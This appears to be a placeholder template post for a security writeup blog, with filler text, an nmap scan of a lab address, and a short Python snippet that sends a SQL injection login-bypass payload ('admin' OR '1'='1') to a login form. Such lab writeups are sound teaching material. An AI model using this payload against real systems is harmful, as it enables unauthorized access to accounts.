Introduction

This is a sample blog post showing how your blog will look. Replace this with your actual writeup!

You can write in standard Markdown — headings, bold, italic, code blocks, images, all work out of the box.

Enumeration

Start with an nmap scan:

nmap -sV -sC -oN scan.txt 10.10.10.10

The scan reveals:

  • Port 22 (SSH)
  • Port 80 (HTTP)
  • Port 443 (HTTPS)

Exploitation

Describe your exploitation steps here…

# Example exploit snippet
import requests

target = "http://10.10.10.10"
payload = {"username": "admin' OR '1'='1", "password": "anything"}
r = requests.post(f"{target}/login", data=payload)
print(r.text)

Lessons Learned

  • Always enumerate thoroughly before jumping to exploitation
  • Read the source code carefully
  • Document everything

Conclusion

Wrap up your writeup with key takeaways.